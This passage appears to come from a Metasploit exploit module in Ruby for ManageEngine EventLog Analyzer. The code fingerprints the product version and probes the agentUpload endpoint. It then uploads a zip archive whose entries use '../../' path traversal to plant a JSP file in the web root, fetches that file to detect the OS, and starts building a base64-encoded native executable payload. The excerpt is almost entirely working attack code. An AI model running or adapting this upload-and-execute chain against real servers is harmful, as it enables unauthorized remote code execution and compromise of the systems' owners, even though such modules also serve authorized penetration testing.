def get_version
res = send_request_cgi({
'uri' => normalize_uri("event/index3.do"),
'method' => 'GET'
})
if res and res.code == 200
if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
return $1
end
end
return "0"
end
def check
version = get_version
if version >= "7" and version <= "9"
# version 7 to < 8.1 detection
res = send_request_cgi({
'uri' => normalize_uri("event/agentUpload"),
'method' => 'GET'
})
if res and res.code == 405
return Exploit::CheckCode::Appears
end
# version 8.1+ detection
res = send_request_cgi({
'uri' => normalize_uri("agentUpload"),
'method' => 'GET'
})
if res and res.code == 405 and version == 8
return Exploit::CheckCode::Appears
else
# We can't be sure that it is vulnerable in version 9
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
def create_zip_and_upload(payload, target_path, is_payload = true)
# Zipping with CM_STORE to avoid errors decompressing the zip
# in the Java vulnerable application
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file(target_path, payload)
post_data = Rex::MIME::Message.new
post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
data = post_data.to_s
if is_payload
print_status("#{peer} - Uploading payload...")
end
res = send_request_cgi({
'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res and res.code == 200 and res.body.empty?
if is_payload
print_status("#{peer} - Payload uploaded successfully")
end
register_files_for_cleanup(target_path.gsub("../../", "../"))
return true
else
return false
end
end
def pick_target
return target if target.name != 'Automatic'
print_status("#{peer} - Determining target")
version = get_version
if version == "7"
return targets[1]
end
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"
if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
if version == "8"
# Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
return targets[1]
end
return nil
end
res = send_request_cgi({
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
if res and res.code == 200
if res.body.to_s =~ /Windows/
return targets[2]
else
# assuming Linux
return targets[3]
end
end
return nil
end
def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'